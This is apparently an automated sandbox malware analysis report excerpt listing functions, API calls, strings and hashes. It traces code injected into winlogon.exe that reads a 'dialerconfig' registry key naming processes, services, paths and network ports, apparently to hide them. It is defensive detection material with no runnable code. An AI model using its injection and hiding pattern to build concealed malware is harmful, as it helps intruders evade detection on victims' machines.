Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction ID: 94a394448baaafbd882dc457d4c1b35388c210f04e63a6837c784238f57ed5ba
Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction Fuzzy Hash: 3811A032B18B5082E719EB01E8083296360FB88FE0F444235DA5D43B94CF7DD509C740

Function 00007FF647341A14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF647341914), ref: 00007FF647341A24
GetProcAddress.KERNEL32(?,?,00000000,00007FF647341914), ref: 00007FF647341A37

Strings

ntdll.dll, xrefs: 00007FF647341A1A

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction ID: bcf0104a46047052cc5b5009feca99cbc9d657ff29b5d39db6639fd4f5d9f7a1
Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction Fuzzy Hash: C7D01295F1EA07C2FE1FBB6668551705361AF5CB85F884430CD1ED7350DE2ED4959310

Analysis Process: powershell.exePID: 8116, Parent PID: 4084COMMON

Executed Functions

Function 00007FFB4B104943 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

p/6K, xrefs: 00007FFB4B104A0A

Memory Dump Source

Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID: p/6K
API String ID: 0-293107504
Opcode ID: a71ea22f4aff410cad356d445b27a5677cc88e4f01170d7281109fab50bbdd3b
Instruction ID: ce15701a44119e9818d02bbde7b76f1587080759b873f7a493eb3c1256d8bff9
Opcode Fuzzy Hash: a71ea22f4aff410cad356d445b27a5677cc88e4f01170d7281109fab50bbdd3b
Instruction Fuzzy Hash: A1417B6292CA464FEB95EE3CC59227077E1EF85324B4841FAC24EC79A7DE14E8058785

Function 00007FFB4B10498F Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

p/6K, xrefs: 00007FFB4B104A0A

Memory Dump Source

Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID: p/6K
API String ID: 0-293107504
Opcode ID: ba1add593d2e72f4a7f42ff7e9f34946104deaa63fc526afdb6aa3081b53c6cf
Instruction ID: 491086db7ed07c5385bcad183d1c3c7e4baa0a28255f0764223c92ecffaf3dc7
Opcode Fuzzy Hash: ba1add593d2e72f4a7f42ff7e9f34946104deaa63fc526afdb6aa3081b53c6cf
Instruction Fuzzy Hash: B72159A292DA474FEBA5EE2CD5D213476E1EF8831474841F9D14EC39B7CE18EC048B85

Function 00007FFB4B104BC8 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87830947c711a23c253ea971f7d79f63030e7a0361cddc8a3c7b10cea5cbf01d
Instruction ID: ccaeee0b6f6f4613cb2c91c5a89a2c7cb16a3c5e20a93abd64a8104052cb22ec
Opcode Fuzzy Hash: 87830947c711a23c253ea971f7d79f63030e7a0361cddc8a3c7b10cea5cbf01d
Instruction Fuzzy Hash: 256169B291DB880FEB56EF3CD9925A43BE0EF86324B0841FAD54DC75A3D918AC05C791

Function 00007FFB4B03A0E5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9ee35e29e43e608eadd47d8cad8d8b03bbed87676a22ce6df5e99d72337336
Instruction ID: 6be4a439bce18ce318414d38d816a61390ae44f341bba0dd33234c6a12b61fe1
Opcode Fuzzy Hash: 3b9ee35e29e43e608eadd47d8cad8d8b03bbed87676a22ce6df5e99d72337336
Instruction Fuzzy Hash: 6D31167191CB4C4FDB18DB5CD84A6A87BE0FB99321F00426FE449C3262DB74A856CBC2

Function 00007FFB4AF1ED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1606427460.00007FFB4AF1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4af1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0ce609280529c2ea213f108c1857ed6d850fa5378f39310816b50706579d92
Instruction ID: 3e104edbfbe946fe6277c7092308cd962ddeafbf1fe24b47d3d602623c41386b
Opcode Fuzzy Hash: cd0ce609280529c2ea213f108c1857ed6d850fa5378f39310816b50706579d92
Instruction Fuzzy Hash: 2B41AE7140DBC44FE7569F39D8459623FB4EF56320B1906DFD088CB1A3DA29A84AC7A2

Function 00007FFB4B03B1D8 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682df2e3f31fbcdf48bd1451fc4f76557a268166de03150924c0b53e8275cb4a
Instruction ID: 49f4d98ca9c805b6aeaa53cac55acd4cbb7ba114382ed1818226f0afd6a27211
Opcode Fuzzy Hash: 682df2e3f31fbcdf48bd1451fc4f76557a268166de03150924c0b53e8275cb4a
Instruction Fuzzy Hash: 4D214C7190C74C4FEB59DFACD84A7E97BE0EB96321F04426FD448C3162D674940ACB92

Function 00007FFB4B104C8C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514ada7b9e821efe761753b1127b755a418f01957ec6098ad5a3e6522b16c182
Instruction ID: 298cbcb89c4f57cc2f2a57600b6bcf1ac0e3fbc90831c9d208061accc2b80d48
Opcode Fuzzy Hash: 514ada7b9e821efe761753b1127b755a418f01957ec6098ad5a3e6522b16c182
Instruction Fuzzy Hash: 4A1136B2A2DA454FEBA5EF2CD5D267437E0EF44364B0900FAE24DC79A3D918AC008B51

Function 00007FFB4B034675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
Instruction ID: 0cc64bf5f3558d98280f025c1af5d4fbb096b054bceaf4e090f5acb51a2c712c
Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
Instruction Fuzzy Hash: A701677111CB0C8FDB44EF5CE451AA5B7E0FB95364F10056EE58AC3661D636E882CB46

Function 00007FFB4B03B017 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e3c35425721939ddeebcfcf0c7456bc70abbb9e72feb731737cce0222ec37ee
Instruction ID: e9c64f58cd36fbff62c21950f60f5c03bc07ef03f717ad4169392158308d79ec
Opcode Fuzzy Hash: 5e3c35425721939ddeebcfcf0c7456bc70abbb9e72feb731737cce0222ec37ee
Instruction Fuzzy Hash: 8BE06D75409A8C8FCB45EF28C8594A97FE0FF65205B05029BE40DC7162DB719958CB82

Function 00007FFB4B1053E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42dc5f7c46fed4dba428ea9aeb794abce13483d4f54361d2ea607a90aa63c182
Instruction ID: 81b1c0b12057c1cc0c2f5450240b22b69ede68c6a8fbbaa2c8e9464956aee7d1
Opcode Fuzzy Hash: 42dc5f7c46fed4dba428ea9aeb794abce13483d4f54361d2ea607a90aa63c182
Instruction Fuzzy Hash: 7BF0A03131CF044FE748EE2DE4497A2B7E1FBA8310F10462FE84AC3251DA21E8818782

Function 00007FFB4B1048C9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aab897b2d02aa54d217a1bf0a1af29a3b9486fc71b8606f3b3300a195734a072
Instruction ID: 1ec5b9f3f06d4d1063e6bf9413d9f369ccffc82406eda2f35a642976df9762b9
Opcode Fuzzy Hash: aab897b2d02aa54d217a1bf0a1af29a3b9486fc71b8606f3b3300a195734a072
Instruction Fuzzy Hash: BBF03071A1C419CFDA58FE1CE1819A873E4EF44325B1040B6E21EC3563DA26EC529B94

Function 00007FFB4B1048D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1609447152.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ba4f69ce56bce1f899fafbe562b8767ca00547a4af2a566346c8b6d289168e
Instruction ID: 2bc1359e3b09880605076189455a29b6ef95d3b0898e89e053dc1e1f82834b1a
Opcode Fuzzy Hash: 40ba4f69ce56bce1f899fafbe562b8767ca00547a4af2a566346c8b6d289168e
Instruction Fuzzy Hash: EEE01A32A1C804CFDB68EF0DE5869E973E0EB54325B5190B6E25EC7532DB21EC519B84

Function 00007FFB4B03B038 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef0a7d47af5e60f36af30cb93e9e528a932e60ff3777b7e252a6d85ab1f59bc
Instruction ID: cac7c884af38601175d80c481ccf4e1cd11095b2506805a00f9d2d70d5ec2148
Opcode Fuzzy Hash: aef0a7d47af5e60f36af30cb93e9e528a932e60ff3777b7e252a6d85ab1f59bc
Instruction Fuzzy Hash: 7BE06D75408A8D8FCB44EF28C4495E57FE0FB28201F00019AE45DC6121D7709554CBC2

Non-executed Functions

Function 00007FFB4B0392FA Relevance: 6.6, Strings: 5, Instructions: 307COMMON

Download Yara Rule

Strings

(C)K, xrefs: 00007FFB4B039431
HC)K, xrefs: 00007FFB4B039451
A)K, xrefs: 00007FFB4B0393D1
0E)K, xrefs: 00007FFB4B039471
XD)K, xrefs: 00007FFB4B039461

Memory Dump Source

Source File: 0000000F.00000002.1608341505.00007FFB4B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4b030000_powershell.jbxd

Similarity

API ID:
String ID: (C)K$0E)K$HC)K$XD)K$A)K
API String ID: 0-263351377
Opcode ID: e5902f9e75785dcaaafdf10205bb10397d7b88b991df44faca14cdf6ca170596
Instruction ID: 6cae0bbf16a2e83da95cfa20e1900833cffafc9f6e2314dd71640bf9d17d5b13
Opcode Fuzzy Hash: e5902f9e75785dcaaafdf10205bb10397d7b88b991df44faca14cdf6ca170596
Instruction Fuzzy Hash: 86A13BE3D0EBC20FE3515A7CADAD0A57F90EF6226570D51FBC1C98B2E7D80958068396

Analysis Process: winlogon.exePID: 556, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	94.3%
Signature Coverage:	0%
Total number of Nodes:	105
Total number of Limit Nodes:	16

Executed Functions

Function 000002E991751650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002E99175165B
HeapAlloc.KERNEL32 ref: 000002E99175166A

Part of subcall function 000002E991751274: GetProcessHeap.KERNEL32 ref: 000002E99175127A
Part of subcall function 000002E991751274: HeapAlloc.KERNEL32 ref: 000002E991751289
Part of subcall function 000002E991751274: GetProcessHeap.KERNEL32 ref: 000002E9917512A3
Part of subcall function 000002E991751274: HeapAlloc.KERNEL32 ref: 000002E9917512B4

RegOpenKeyExW.ADVAPI32 ref: 000002E9917516DA
RegOpenKeyExW.ADVAPI32 ref: 000002E991751707
RegCloseKey.ADVAPI32 ref: 000002E991751721
RegOpenKeyExW.ADVAPI32 ref: 000002E991751741
RegCloseKey.ADVAPI32 ref: 000002E99175175C
RegOpenKeyExW.ADVAPI32 ref: 000002E99175177C
RegCloseKey.ADVAPI32 ref: 000002E991751797
RegOpenKeyExW.ADVAPI32 ref: 000002E9917517B7
RegCloseKey.ADVAPI32 ref: 000002E9917517D2
RegOpenKeyExW.ADVAPI32 ref: 000002E9917517F2
RegCloseKey.ADVAPI32 ref: 000002E99175180D
RegOpenKeyExW.ADVAPI32 ref: 000002E99175182D
RegCloseKey.ADVAPI32 ref: 000002E991751848
RegOpenKeyExW.ADVAPI32 ref: 000002E991751868
RegCloseKey.ADVAPI32 ref: 000002E991751883
RegOpenKeyExW.ADVAPI32 ref: 000002E9917518A3
RegCloseKey.ADVAPI32 ref: 000002E9917518BE
RegCloseKey.ADVAPI32 ref: 000002E9917518C8

Part of subcall function 000002E9917512C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002E991751326
Part of subcall function 000002E9917512C8: GetProcessHeap.KERNEL32 ref: 000002E991751334
Part of subcall function 000002E9917512C8: HeapAlloc.KERNEL32 ref: 000002E991751345
Part of subcall function 000002E9917512C8: RegEnumValueW.ADVAPI32 ref: 000002E9917513A1
Part of subcall function 000002E9917512C8: GetProcessHeap.KERNEL32 ref: 000002E9917513E9
Part of subcall function 000002E9917512C8: HeapAlloc.KERNEL32 ref: 000002E9917513F7
Part of subcall function 000002E9917512C8: GetProcessHeap.KERNEL32 ref: 000002E99175141B
Part of subcall function 000002E9917512C8: HeapFree.KERNEL32 ref: 000002E991751429
Part of subcall function 000002E9917512C8: lstrlenW.KERNEL32 ref: 000002E991751432
Part of subcall function 000002E9917512C8: GetProcessHeap.KERNEL32 ref: 000002E991751440
Part of subcall function 000002E9917512C8: HeapAlloc.KERNEL32 ref: 000002E99175144E

Strings

process_names, xrefs: 000002E991751775
tcp_remote, xrefs: 000002E991751861
udp, xrefs: 000002E99175189C
paths, xrefs: 000002E9917517B0
service_names, xrefs: 000002E9917517EB
SOFTWARE\dialerconfig, xrefs: 000002E9917516BA
pid, xrefs: 000002E99175173A
startup, xrefs: 000002E9917516FD
tcp_local, xrefs: 000002E991751826

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 4162b084441f9fa799f7d865867af365c1d259b96ccff973954a46099f7d702a
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: F7713F36750B9685EB109F67E84869D37B5F784BC9F42112ADE4E87B2ADF34C484CB20

Function 000002E991755C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E991755C4B
GetThreadContext.KERNEL32 ref: 000002E991755DB5

Part of subcall function 000002E991755A40: GetCurrentThreadId.KERNEL32 ref: 000002E991755A44

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: d8e9435e92dba28f12f6f3d3e015c2cf867da3c8eee2266169f1663f505a57da
Instruction ID: 7bd6c0a2e4286c8282e8c05088106714b262c530c9c8d43f17b3eadfe12b3437
Opcode Fuzzy Hash: d8e9435e92dba28f12f6f3d3e015c2cf867da3c8eee2266169f1663f505a57da
Instruction Fuzzy Hash: A0D19C76248BC981DA70DB1AE49835A77A0F788B84F55421AEACD47BA6DF3CC581CF10

Function 000002E9917551B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E991755236

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 8cbbc977435add57f842a8b021d8bf7d85f171c4fe5f6a5014daddc4a4f41314
Instruction ID: 5e5e6cc80da58938c382c042a5af79f0686d595793a5846c133376b694f2e86e
Opcode Fuzzy Hash: 8cbbc977435add57f842a8b021d8bf7d85f171c4fe5f6a5014daddc4a4f41314
Instruction Fuzzy Hash: 8202B732259BC186E760CB56E49835AB7A1F3C4794F11411AEA8E87BAADF7CC484CF50

Function 000002E991753878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000002E991753886
GetCurrentProcess.KERNEL32 ref: 000002E9917538B4
VirtualProtectEx.KERNEL32 ref: 000002E9917538D6
GetCurrentProcess.KERNEL32 ref: 000002E9917538F4
VirtualProtectEx.KERNEL32 ref: 000002E991753915

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: fb0d299a20e61ec6a0a7fb258e605bd4a75435ac0177169b2b99dd545a7d002d
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 83115225745B8682FB149B12F4087596671F744B84F06002EDE8D47765EF3DC588CB30

Function 000002E991753AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000002E991753B46
VirtualAlloc.KERNEL32 ref: 000002E991753B80

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: e30601996f0fb4d63c2e70485e6b4a8988ce8091004eb0a8438b9fc388cea9e2
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: A731F022359AC581EB70DA16E05835A62A4F388784F51052EF5CD46BBADF7DC6D08F34

Function 000002E991753458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002E99175347A
PathFindFileNameW.SHLWAPI ref: 000002E991753489

Part of subcall function 000002E991753930: StrCmpNIW.SHLWAPI ref: 000002E991753948

Part of subcall function 000002E991753878: GetModuleHandleW.KERNEL32 ref: 000002E991753886
Part of subcall function 000002E991753878: GetCurrentProcess.KERNEL32 ref: 000002E9917538B4
Part of subcall function 000002E991753878: VirtualProtectEx.KERNEL32 ref: 000002E9917538D6
Part of subcall function 000002E991753878: GetCurrentProcess.KERNEL32 ref: 000002E9917538F4
Part of subcall function 000002E991753878: VirtualProtectEx.KERNEL32 ref: 000002E991753915

CreateThread.KERNEL32 ref: 000002E9917534D7

Part of subcall function 000002E991751EB4: GetCurrentThread.KERNEL32 ref: 000002E991751EBF

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 0635807564e77f13ae74a36e4a72a12785658fe00d21cd20de5c03cb8d955614
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 4A1161747946C341F721D723F54E7652690BB54345F46011F990A852A7EF3DC4C88E31

Function 000002E991754ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000002E991754ED4
VirtualProtect.KERNEL32 ref: 000002E991754F17
FlushInstructionCache.KERNEL32 ref: 000002E991754F2C

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: fa80118fe249bd35abe59bcf7ef86c28b21aee29b6d9f8ccec37127585c6c8e8
Instruction ID: 615a944b99c68a79630933e1de177a6d9d4b76c57b13ea9d01f63c64e3bba0af
Opcode Fuzzy Hash: fa80118fe249bd35abe59bcf7ef86c28b21aee29b6d9f8ccec37127585c6c8e8
Instruction Fuzzy Hash: E2F0302626CB8580D630DB07E44934A67A0F3CC7D8F55011AF98E07BAADF38C6C08F10

Function 000002E991722908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002E9917229AA
LoadLibraryA.KERNELBASE ref: 000002E991722A31

Memory Dump Source

Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 2928828b46b0df8fee0d695b6055512b29190d9793752729c3f51ee003bf7ea7
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 056128327426D287EF68CF16D44476C73A1FB04B94F55881ADE1907786EB38D893CB20

Function 000002E991751C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002E991751650: GetProcessHeap.KERNEL32 ref: 000002E99175165B
Part of subcall function 000002E991751650: HeapAlloc.KERNEL32 ref: 000002E99175166A
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516DA
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E991751707
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751721
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E991751741
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E99175175C
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E99175177C
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751797
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917517B7
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E9917517D2
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917517F2

Sleep.KERNEL32 ref: 000002E991751C43
SleepEx.KERNELBASE ref: 000002E991751C49

Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E99175180D
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E99175182D
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751848
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E991751868
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751883
Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917518A3
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E9917518BE
Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E9917518C8

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: e54bd70fbade5051346577d6c3055090c9beb650c3de455b1e6ccabc5511d51c
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 4C31CC6538078391FA50AB37DA4935A13A5BB44BD6F1A502BDE0B87697FF34C8D08A70

Function 000002E991782908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002E9917829AA

Memory Dump Source

Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
